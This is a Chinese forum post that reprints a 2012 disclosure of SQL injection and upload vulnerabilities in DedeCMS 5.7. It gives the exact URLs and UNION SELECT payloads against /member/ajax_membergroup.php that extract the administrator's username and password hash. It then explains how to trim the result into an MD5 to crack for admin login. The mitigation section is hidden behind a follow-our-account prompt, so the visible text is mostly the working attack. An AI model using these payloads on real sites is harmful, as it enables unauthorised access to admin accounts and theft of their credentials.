|
dedecms5.7最新注入和上传漏洞(2012.4.26) 发布时间:2012-4.26 漏洞类型:注入漏洞、上传漏洞 获取dedecms版本升级时间:“/data/admin/ver.txt”页面获取系统最后升级时间。 然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如下图说明该版本存在漏洞。 /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看id为1(管理员)的用户名。 /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看id为1(管理员)的密码 得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5。 至此得到管理员用户名为admin和密码的md5,解密md5即可以管理员权限登录后台。 官方临时解决方法: 方案一、临时补丁 方案...
 内容已隐藏,请关注公众号输入验证码查看
本帖支持关注公众号查看
【无套路 无套路 无套路 扫描二维码关注公众号发送【验证码】收到验证码 在上面输入点击提交查看即可显示隐藏内容】
| 
发表于 2019-3-29 14:32:00
